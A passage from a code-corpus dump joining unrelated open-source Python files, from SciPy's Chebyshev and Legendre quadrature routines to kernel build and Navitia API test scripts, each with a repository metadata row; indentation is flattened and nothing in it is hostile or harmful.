:math:`[-2, 2]` with weight function :math:`f(x) = 1/\sqrt{1 - (x/2)^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyt(n, True)
x *= 2
w *= 2
m *= 2
if mu:
return x, w, m
else:
return x, w
def chebyc(n, monic=False):
r"""Chebyshev polynomial of the first kind on :math:`[-2, 2]`.
Defined as :math:`C_n(x) = 2T_n(x/2)`, where :math:`T_n` is the
    nth Chebyshev polynomial of the first kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
C : orthopoly1d
Chebyshev polynomial of the first kind on :math:`[-2, 2]`.
Notes
-----
The polynomials :math:`C_n(x)` are orthogonal over :math:`[-2, 2]`
with weight function :math:`1/\sqrt{1 - (x/2)^2}`.
See Also
--------
chebyt : Chebyshev polynomial of the first kind.
References
----------
.. [1] Abramowitz and Stegun, "Handbook of Mathematical Functions"
Section 22. National Bureau of Standards, 1972.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_chebyc(n1, mu=True)
if n == 0:
x, w = [], []
hn = 4 * pi * ((n == 0) + 1)
kn = 1.0
p = orthopoly1d(x, w, hn, kn,
wfunc=lambda x: 1.0 / sqrt(1 - x * x / 4.0),
limits=(-2, 2), monic=monic)
if not monic:
p._scale(2.0 / p(2))
p.__dict__['_eval_func'] = lambda x: eval_chebyc(n, x)
return p
# Chebyshev of the second kind S_n(x)
def roots_chebys(n, mu=False):
r"""Gauss-Chebyshev (second kind) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree Chebyshev polynomial of
the second kind, :math:`S_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-2, 2]` with weight function :math:`f(x) = \sqrt{1 - (x/2)^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyu(n, True)
x *= 2
w *= 2
m *= 2
if mu:
return x, w, m
else:
return x, w
def chebys(n, monic=False):
r"""Chebyshev polynomial of the second kind on :math:`[-2, 2]`.
Defined as :math:`S_n(x) = U_n(x/2)` where :math:`U_n` is the
    nth Chebyshev polynomial of the second kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
S : orthopoly1d
Chebyshev polynomial of the second kind on :math:`[-2, 2]`.
Notes
-----
The polynomials :math:`S_n(x)` are orthogonal over :math:`[-2, 2]`
    with weight function :math:`\sqrt{1 - (x/2)^2}`.
See Also
--------
chebyu : Chebyshev polynomial of the second kind
References
----------
.. [1] Abramowitz and Stegun, "Handbook of Mathematical Functions"
Section 22. National Bureau of Standards, 1972.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_chebys(n1, mu=True)
if n == 0:
x, w = [], []
hn = pi
kn = 1.0
p = orthopoly1d(x, w, hn, kn,
wfunc=lambda x: sqrt(1 - x * x / 4.0),
limits=(-2, 2), monic=monic)
if not monic:
factor = (n + 1.0) / p(2)
p._scale(factor)
p.__dict__['_eval_func'] = lambda x: eval_chebys(n, x)
return p
# Shifted Chebyshev of the first kind T^*_n(x)
def roots_sh_chebyt(n, mu=False):
r"""Gauss-Chebyshev (first kind, shifted) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree shifted Chebyshev
polynomial of the first kind, :math:`T_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, 1]` with weight function
:math:`f(x) = 1/\sqrt{x - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
xw = roots_chebyt(n, mu)
return ((xw[0] + 1) / 2,) + xw[1:]
def sh_chebyt(n, monic=False):
r"""Shifted Chebyshev polynomial of the first kind.
Defined as :math:`T^*_n(x) = T_n(2x - 1)` for :math:`T_n` the nth
Chebyshev polynomial of the first kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
T : orthopoly1d
Shifted Chebyshev polynomial of the first kind.
Notes
-----
The polynomials :math:`T^*_n` are orthogonal over :math:`[0, 1]`
with weight function :math:`(x - x^2)^{-1/2}`.
"""
base = sh_jacobi(n, 0.0, 0.5, monic=monic)
if monic:
return base
if n > 0:
factor = 4**n / 2.0
else:
factor = 1.0
base._scale(factor)
return base
# Shifted Chebyshev of the second kind U^*_n(x)
def roots_sh_chebyu(n, mu=False):
r"""Gauss-Chebyshev (second kind, shifted) quadrature.
Computes the sample points and weights for Gauss-Chebyshev quadrature.
The sample points are the roots of the n-th degree shifted Chebyshev
polynomial of the second kind, :math:`U_n(x)`. These sample points and
weights correctly integrate polynomials of degree :math:`2n - 1` or less
over the interval :math:`[0, 1]` with weight function
:math:`f(x) = \sqrt{x - x^2}`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w, m = roots_chebyu(n, True)
x = (x + 1) / 2
m_us = cephes.beta(1.5, 1.5)
w *= m_us / m
if mu:
return x, w, m_us
else:
return x, w
def sh_chebyu(n, monic=False):
r"""Shifted Chebyshev polynomial of the second kind.
Defined as :math:`U^*_n(x) = U_n(2x - 1)` for :math:`U_n` the nth
Chebyshev polynomial of the second kind.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
U : orthopoly1d
Shifted Chebyshev polynomial of the second kind.
Notes
-----
The polynomials :math:`U^*_n` are orthogonal over :math:`[0, 1]`
with weight function :math:`(x - x^2)^{1/2}`.
"""
base = sh_jacobi(n, 2.0, 1.5, monic=monic)
if monic:
return base
factor = 4**n
base._scale(factor)
return base
# Legendre
def roots_legendre(n, mu=False):
r"""Gauss-Legendre quadrature.
Computes the sample points and weights for Gauss-Legendre quadrature.
The sample points are the roots of the n-th degree Legendre polynomial
:math:`P_n(x)`. These sample points and weights correctly integrate
polynomials of degree :math:`2n - 1` or less over the interval
:math:`[-1, 1]` with weight function :math:`f(x) = 1.0`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
numpy.polynomial.legendre.leggauss
"""
m = int(n)
if n < 1 or n != m:
raise ValueError("n must be a positive integer.")
mu0 = 2.0
an_func = lambda k: 0.0 * k
bn_func = lambda k: k * np.sqrt(1.0 / (4 * k * k - 1))
f = cephes.eval_legendre
df = lambda n, x: (-n*x*cephes.eval_legendre(n, x)
+ n*cephes.eval_legendre(n-1, x))/(1-x**2)
return _gen_roots_and_weights(m, mu0, an_func, bn_func, f, df, True, mu)
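# Illustrative check (doctest-style sketch): a four-point rule integrates
# polynomials up to degree 7 exactly, e.g. the integral of x**6 over [-1, 1] is 2/7.
#     >>> x, w = roots_legendre(4)
#     >>> np.allclose(np.sum(w * x**6), 2.0 / 7.0)
#     True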
def legendre(n, monic=False):
r"""Legendre polynomial.
Defined to be the solution of
.. math::
\frac{d}{dx}\left[(1 - x^2)\frac{d}{dx}P_n(x)\right]
+ n(n + 1)P_n(x) = 0;
:math:`P_n(x)` is a polynomial of degree :math:`n`.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Legendre polynomial.
Notes
-----
The polynomials :math:`P_n` are orthogonal over :math:`[-1, 1]`
with weight function 1.
Examples
--------
Generate the 3rd-order Legendre polynomial 1/2*(5x^3 + 0x^2 - 3x + 0):
>>> from scipy.special import legendre
>>> legendre(3)
poly1d([ 2.5, 0. , -1.5, 0. ])
"""
if n < 0:
raise ValueError("n must be nonnegative.")
if n == 0:
n1 = n + 1
else:
n1 = n
x, w, mu0 = roots_legendre(n1, mu=True)
if n == 0:
x, w = [], []
hn = 2.0 / (2 * n + 1)
kn = _gam(2 * n + 1) / _gam(n + 1)**2 / 2.0**n
p = orthopoly1d(x, w, hn, kn, wfunc=lambda x: 1.0, limits=(-1, 1),
monic=monic, eval_func=lambda x: eval_legendre(n, x))
return p
# Shifted Legendre P^*_n(x)
def roots_sh_legendre(n, mu=False):
r"""Gauss-Legendre (shifted) quadrature.
Computes the sample points and weights for Gauss-Legendre quadrature.
The sample points are the roots of the n-th degree shifted Legendre
polynomial :math:`P^*_n(x)`. These sample points and weights correctly
integrate polynomials of degree :math:`2n - 1` or less over the interval
:math:`[0, 1]` with weight function :math:`f(x) = 1.0`.
Parameters
----------
n : int
quadrature order
mu : bool, optional
If True, return the sum of the weights, optional.
Returns
-------
x : ndarray
Sample points
w : ndarray
Weights
mu : float
Sum of the weights
See Also
--------
scipy.integrate.quadrature
scipy.integrate.fixed_quad
"""
x, w = roots_legendre(n)
x = (x + 1) / 2
w /= 2
if mu:
return x, w, 1.0
else:
return x, w
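# Illustrative check (doctest-style sketch): on the shifted interval [0, 1] the
# integral of x**2 is 1/3 and is reproduced exactly by a two-point rule.
#     >>> x, w = roots_sh_legendre(2)
#     >>> np.allclose(np.sum(w * x**2), 1.0 / 3.0)
#     True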
def sh_legendre(n, monic=False):
r"""Shifted Legendre polynomial.
Defined as :math:`P^*_n(x) = P_n(2x - 1)` for :math:`P_n` the nth
Legendre polynomial.
Parameters
----------
n : int
Degree of the polynomial.
monic : bool, optional
If `True`, scale the leading coefficient to be 1. Default is
`False`.
Returns
-------
P : orthopoly1d
Shifted Legendre polynomial.
Notes
-----
The polynomials :math:`P^*_n` are orthogonal over :math:`[0, 1]`
with weight function 1.
"""
if n < 0:
raise ValueError("n must be nonnegative.")
wfunc = lambda x: 0.0 * x + 1.0
if n == 0:
return orthopoly1d([], [], 1.0, 1.0, wfunc, (0, 1), monic,
lambda x: eval_sh_legendre(n, x))
x, w, mu0 = roots_sh_legendre(n, mu=True)
hn = 1.0 / (2 * n + 1.0)
kn = _gam(2 * n + 1) / _gam(n + 1)**2
p = orthopoly1d(x, w, hn, kn, wfunc, limits=(0, 1), monic=monic,
eval_func=lambda x: eval_sh_legendre(n, x))
return p
# -----------------------------------------------------------------------------
# Code for backwards compatibility
# -----------------------------------------------------------------------------
# Import functions in case someone is still calling the orthogonal
# module directly. (They shouldn't be; it's not in the public API).
poch = cephes.poch
from ._ufuncs import (binom, eval_jacobi, eval_sh_jacobi, eval_gegenbauer,
eval_chebyt, eval_chebyu, eval_chebys, eval_chebyc,
eval_sh_chebyt, eval_sh_chebyu, eval_legendre,
eval_sh_legendre, eval_genlaguerre, eval_laguerre,
eval_hermite, eval_hermitenorm)
# Make the old root function names an alias for the new ones
_modattrs = globals()
for newfun, oldfun in _rootfuns_map.items():
_modattrs[oldfun] = _modattrs[newfun]
__all__.append(oldfun)
| bsd-3-clause | -6,653,320,370,332,630,000 | 27.296154 | 139 | 0.55544 | false |
lobnek/pyutil | test/test_mongo/test_engine/test_strategy.py | 1 | 3434 | from pyutil.mongo.engine.strategy import Strategy, strategies, configuration
from pyutil.mongo.engine.symbol import Symbol, Group
from pyutil.performance.drawdown import drawdown
from pyutil.performance.month import monthlytable
from pyutil.performance.return_series import from_nav
from pyutil.portfolio.portfolio import similar
import pandas.testing as pt
from test.config import *
@pytest.fixture()
def group():
Group.objects.delete()
return Group(name="US Equity").save()
@pytest.fixture()
def symbols(group, portfolio):
Symbol.objects.delete()
# add the symbols to database
for symbol in portfolio.assets:
Symbol(name=symbol, group=group).save()
def test_strategy(symbols, portfolio):
Strategy.objects.delete()
s = Strategy(name="mdt", type="mdt", active=True, source="AAA")
assert s.source == "AAA"
assert s.type == "mdt"
assert s.active
assert s.portfolio is None
assert s.last_valid_index is None
# empty dictionary as portfolio hasn't been set
assert Strategy.portfolios(strategies=[s]) == {}
s.save()
frame = Strategy.reference_frame()
assert frame.index.name == "strategy"
s.portfolio = portfolio
pt.assert_frame_equal(s.portfolio.weights, portfolio.weights)
pt.assert_frame_equal(s.portfolio.prices, portfolio.prices)
s.save()
similar(Strategy.portfolios(strategies=[s])["mdt"], portfolio)
navs = Strategy.navs()
assert not navs["mdt"].empty
frame = Strategy.sectors(strategies=[s])
assert frame.index.name == "Portfolio"
assert set(frame.keys()) == {"US Equity", "Total"}
assert frame.loc["mdt"]["US Equity"] == pytest.approx(0.308974, abs=1e-5)
def test_source(portfolio):
with open(resource("source.py"), "r") as f:
s = Strategy(name="Peter", source=f.read(), active=True, type="wild")
    # construct the configuration based on the strategy (and its source code)
c = configuration(strategy=s)
# verify the names of the configuration
assert c.names == portfolio.assets
# also possible to ask the strategy directly
assert s.assets == portfolio.assets
def test_last_valid(portfolio):
s = Strategy(name="Maffay", source="AAA", active=True, type="wild2")
s.portfolio = portfolio
assert s.last_valid_index == portfolio.prices.last_valid_index()
assert similar(s.portfolio, portfolio)
def test_strategies():
folder = resource(name="strat")
for name, source in strategies(folder=folder):
assert name in {"P1", "P2"}
def test_active():
Strategy.objects.delete()
Strategy(name="A", active=False).save()
Strategy(name="B", active=True).save()
assert len(Strategy.active_strategies()) == 1
assert len(Strategy.objects) == 2
def test_drawdown(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_series_equal(drawdown(portfolio.nav), s.drawdown)
def test_volatility(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_series_equal(from_nav(portfolio.nav).ewm_volatility().dropna(), s.ewm_volatility())
def test_monthlytable(portfolio):
Strategy.objects.delete()
s = Strategy(name="Maffay", source="")
s.portfolio = portfolio
pt.assert_frame_equal(monthlytable(portfolio.nav.pct_change()), s.monthlytable) | mit | 5,867,971,628,889,860,000 | 29.39823 | 97 | 0.689866 | false |
KlinkOnE/caf-port | scripts/gcc-wrapper.py | 1 | 3550 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"alignment.c:720",
"async.c:122",
"async.c:270",
"dir.c:43",
"dm.c:1053",
"dm.c:1080",
"dm-table.c:1120",
"dm-table.c:1126",
"drm_edid.c:1303",
"eventpoll.c:1143",
"f_mass_storage.c:3368",
"inode.c:72",
"inode.c:73",
"inode.c:74",
"msm_sdcc.c:126",
"msm_sdcc.c:128",
"nf_conntrack_netlink.c:790",
"nf_nat_standalone.c:118",
"return_address.c:61",
"soc-core.c:1719",
"xt_log.h:50",
])
# Capture the name of the object file, so we can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
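# Illustrative example (not part of the build): for a line such as
# "kernel/sched/core.c:123:4: warning: unused variable 'x'",
# warning_re captures group(2) == "core.c:123", which is the key compared
# against the allowed_warnings whitelist above.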
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
# if m and m.group(2) not in allowed_warnings:
# print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
# if ofile:
# try:
# os.remove(ofile)
# except OSError:
# pass
# sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
| gpl-2.0 | -2,623,976,439,378,806,300 | 32.17757 | 97 | 0.663099 | false |
CanalTP/navitia | source/tyr/tests/integration/autocomplete_test.py | 1 | 11540 | # coding: utf-8
# Copyright (c) 2001-2018, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, division, unicode_literals
from tests.check_utils import api_get, api_post, api_delete, api_put, _dt
import json
import pytest
import jmespath
from navitiacommon import models
from tyr import app
@pytest.fixture
def create_autocomplete_parameter():
with app.app_context():
autocomplete_param = models.AutocompleteParameter('idf', 'OSM', 'BANO', 'FUSIO', 'OSM', [8, 9])
models.db.session.add(autocomplete_param)
models.db.session.commit()
# we also create 3 datasets, one for bano, 2 for osm
for i, dset_type in enumerate(['bano', 'osm', 'osm']):
job = models.Job()
dataset = models.DataSet()
dataset.type = dset_type
dataset.family_type = 'autocomplete_{}'.format(dataset.type)
dataset.name = '/path/to/dataset_{}'.format(i)
models.db.session.add(dataset)
job.autocomplete_params_id = autocomplete_param.id
job.data_sets.append(dataset)
job.state = 'done'
models.db.session.add(job)
models.db.session.commit()
@pytest.fixture
def create_two_autocomplete_parameters():
with app.app_context():
autocomplete_param1 = models.AutocompleteParameter('europe', 'OSM', 'BANO', 'OSM', 'OSM', [8, 9])
autocomplete_param2 = models.AutocompleteParameter('france', 'OSM', 'OSM', 'FUSIO', 'OSM', [8, 9])
models.db.session.add(autocomplete_param1)
models.db.session.add(autocomplete_param2)
models.db.session.commit()
@pytest.fixture
def autocomplete_parameter_json():
return {
"name": "peru",
"street": "OSM",
"address": "BANO",
"poi": "FUSIO",
"admin": "OSM",
"admin_level": [8],
}
def test_get_autocomplete_parameters_empty():
resp = api_get('/v0/autocomplete_parameters/')
assert resp == []
def test_get_all_autocomplete(create_autocomplete_parameter):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 1
assert resp[0]['name'] == 'idf'
assert resp[0]['street'] == 'OSM'
assert resp[0]['address'] == 'BANO'
assert resp[0]['poi'] == 'FUSIO'
assert resp[0]['admin'] == 'OSM'
assert resp[0]['admin_level'] == [8, 9]
assert not resp[0]['config_toml']
def test_get_autocomplete_by_name(create_two_autocomplete_parameters):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 2
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
assert resp['street'] == 'OSM'
assert resp['address'] == 'OSM'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8, 9]
assert not resp['config_toml']
def test_post_autocomplete(autocomplete_parameter_json):
resp = api_post(
'/v0/autocomplete_parameters',
data=json.dumps(autocomplete_parameter_json),
content_type='application/json',
)
assert resp['name'] == 'peru'
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert not resp['config_toml']
def test_post_autocomplete_cosmo():
resp = api_post(
'/v0/autocomplete_parameters',
data=json.dumps({"name": "bobette", "admin": "COSMOGONY"}),
content_type='application/json',
)
assert resp['name'] == 'bobette'
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'COSMOGONY'
assert resp['admin_level'] == []
assert not resp['config_toml']
def test_put_autocomplete(create_two_autocomplete_parameters, autocomplete_parameter_json):
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
assert resp['street'] == 'OSM'
assert resp['address'] == 'OSM'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8, 9]
assert not resp['config_toml']
resp = api_put(
'/v0/autocomplete_parameters/france',
data=json.dumps(autocomplete_parameter_json),
content_type='application/json',
)
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'FUSIO'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert not resp['config_toml']
def test_create_autocomplete_with_config_toml():
json_with_config_toml = {
"name": "bobette",
"address": "BANO",
"admin": "OSM",
"admin_level": [8],
"config_toml": "dataset = \"bobette\"\n\n[admin]\nimport = true\ncity_level = 8\nlevels = [8]\n\n"
"[way]\nimport = true\n\n[poi]\nimport = true\n",
"poi": "OSM",
"street": "OSM",
}
resp = api_post(
'/v0/autocomplete_parameters', data=json.dumps(json_with_config_toml), content_type='application/json'
)
assert resp['name'] == json_with_config_toml["name"]
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert resp['config_toml'] == json_with_config_toml["config_toml"]
def test_put_autocomplete_with_config_toml_not_in_database():
json_with_config_toml = {
"name": "bobette",
"address": "BANO",
"admin": "OSM",
"admin_level": [8],
"config_toml": "dataset = \"bobette\"\n\n[admin]\nimport = true\ncity_level = 8\nlevels = [8]\n\n"
"[way]\nimport = true\n\n[poi]\nimport = true\n",
"poi": "OSM",
"street": "OSM",
}
resp, status_code = api_put(
'/v0/autocomplete_parameters/bobette',
data=json.dumps(json_with_config_toml),
content_type='application/json',
check=False,
)
assert status_code == 201
assert resp['name'] == json_with_config_toml["name"]
assert resp['street'] == 'OSM'
assert resp['address'] == 'BANO'
assert resp['poi'] == 'OSM'
assert resp['admin'] == 'OSM'
assert resp['admin_level'] == [8]
assert resp['config_toml'] == json_with_config_toml["config_toml"]
def test_delete_autocomplete(create_two_autocomplete_parameters):
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 2
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
_, status = api_delete('/v0/autocomplete_parameters/france', check=False, no_json=True)
assert status == 204
_, status = api_get('/v0/autocomplete_parameters/france', check=False)
assert status == 404
resp = api_get('/v0/autocomplete_parameters/')
assert len(resp) == 1
def test_get_last_datasets_autocomplete(create_autocomplete_parameter):
"""
we query the loaded datasets of idf
    we loaded 3 datasets, but by default we should get one per family_type: one for bano, one for osm
"""
resp = api_get('/v0/autocomplete_parameters/idf/last_datasets')
assert len(resp) == 2
bano = next((d for d in resp if d['type'] == 'bano'), None)
assert bano
assert bano['family_type'] == 'autocomplete_bano'
assert bano['name'] == '/path/to/dataset_0'
osm = next((d for d in resp if d['type'] == 'osm'), None)
assert osm
assert osm['family_type'] == 'autocomplete_osm'
assert osm['name'] == '/path/to/dataset_2' # we should have the last one
# if we ask for the 2 last datasets per type, we got all of them
resp = api_get('/v0/autocomplete_parameters/idf/last_datasets?count=2')
assert len(resp) == 3
@pytest.fixture
def minimal_poi_types_json():
return {
"poi_types": [
{"id": "amenity:bicycle_rental", "name": "Station VLS"},
{"id": "amenity:parking", "name": "Parking"},
],
"rules": [
{
"osm_tags_filters": [{"key": "amenity", "value": "bicycle_rental"}],
"poi_type_id": "amenity:bicycle_rental",
},
{"osm_tags_filters": [{"key": "amenity", "value": "parking"}], "poi_type_id": "amenity:parking"},
],
}
def test_autocomplete_poi_types(create_two_autocomplete_parameters, minimal_poi_types_json):
resp = api_get('/v0/autocomplete_parameters/france')
assert resp['name'] == 'france'
# POST a minimal conf
resp = api_post(
'/v0/autocomplete_parameters/france/poi_types',
data=json.dumps(minimal_poi_types_json),
content_type='application/json',
)
def test_minimal_conf(resp):
assert len(resp['poi_types']) == 2
assert len(resp['rules']) == 2
bss_type = jmespath.search("poi_types[?id=='amenity:bicycle_rental']", resp)
assert len(bss_type) == 1
assert bss_type[0]['name'] == 'Station VLS'
bss_rule = jmespath.search("rules[?poi_type_id=='amenity:bicycle_rental']", resp)
assert len(bss_rule) == 1
assert bss_rule[0]['osm_tags_filters'][0]['value'] == 'bicycle_rental'
# check that it's not the "default" conf
assert not jmespath.search("poi_types[?id=='amenity:townhall']", resp)
# check that the conf is correctly set on france
test_minimal_conf(resp)
# check that the conf on europe is still empty
resp = api_get('/v0/autocomplete_parameters/europe/poi_types')
assert not resp
# check GET of newly defined france conf
resp = api_get('/v0/autocomplete_parameters/france/poi_types')
test_minimal_conf(resp)
# check DELETE of france conf
resp, code = api_delete('/v0/autocomplete_parameters/france/poi_types', check=False, no_json=True)
assert not resp
assert code == 204
# check get of conf on france is now empty
resp = api_get('/v0/autocomplete_parameters/france/poi_types')
assert not resp
# check that tyr refuses incorrect conf
resp, code = api_post(
'/v0/autocomplete_parameters/france/poi_types',
data=json.dumps({'poi_types': [{'id': 'bob', 'name': 'Bob'}]}),
content_type='application/json',
check=False,
)
assert code == 400
assert resp['status'] == 'error'
assert 'rules' in resp['message']
| agpl-3.0 | 7,122,653,603,733,621,000 | 33.550898 | 110 | 0.62175 | false |
samuelshaner/openmc | tests/run_tests.py | 1 | 17900 | #!/usr/bin/env python
from __future__ import print_function
import os
import sys
import shutil
import re
import glob
import socket
from subprocess import call, check_output
from collections import OrderedDict
from optparse import OptionParser
# Command line parsing
parser = OptionParser()
parser.add_option('-j', '--parallel', dest='n_procs', default='1',
help="Number of parallel jobs.")
parser.add_option('-R', '--tests-regex', dest='regex_tests',
help="Run tests matching regular expression. \
Test names are the directories present in tests folder.\
This uses standard regex syntax to select tests.")
parser.add_option('-C', '--build-config', dest='build_config',
help="Build configurations matching regular expression. \
Specific build configurations can be printed out with \
optional argument -p, --print. This uses standard \
regex syntax to select build configurations.")
parser.add_option('-l', '--list', action="store_true",
dest="list_build_configs", default=False,
help="List out build configurations.")
parser.add_option("-p", "--project", dest="project", default="",
help="project name for build")
parser.add_option("-D", "--dashboard", dest="dash",
help="Dash name -- Experimental, Nightly, Continuous")
parser.add_option("-u", "--update", action="store_true", dest="update",
help="Allow CTest to update repo. (WARNING: may overwrite\
changes that were not pushed.")
parser.add_option("-s", "--script", action="store_true", dest="script",
help="Activate CTest scripting mode for coverage, valgrind\
and dashboard capability.")
(options, args) = parser.parse_args()
# Default compiler paths
FC='gfortran'
CC='gcc'
MPI_DIR='/opt/mpich/3.2-gnu'
HDF5_DIR='/opt/hdf5/1.8.16-gnu'
PHDF5_DIR='/opt/phdf5/1.8.16-gnu'
# Script mode for extra capability
script_mode = False
# Override default compiler paths if environmental vars are found
if 'FC' in os.environ:
FC = os.environ['FC']
if 'CC' in os.environ:
CC = os.environ['CC']
if 'MPI_DIR' in os.environ:
MPI_DIR = os.environ['MPI_DIR']
if 'HDF5_DIR' in os.environ:
HDF5_DIR = os.environ['HDF5_DIR']
if 'PHDF5_DIR' in os.environ:
PHDF5_DIR = os.environ['PHDF5_DIR']
# CTest script template
ctest_str = """set (CTEST_SOURCE_DIRECTORY "{source_dir}")
set (CTEST_BINARY_DIRECTORY "{build_dir}")
set(CTEST_SITE "{host_name}")
set (CTEST_BUILD_NAME "{build_name}")
set (CTEST_CMAKE_GENERATOR "Unix Makefiles")
set (CTEST_BUILD_OPTIONS "{build_opts}")
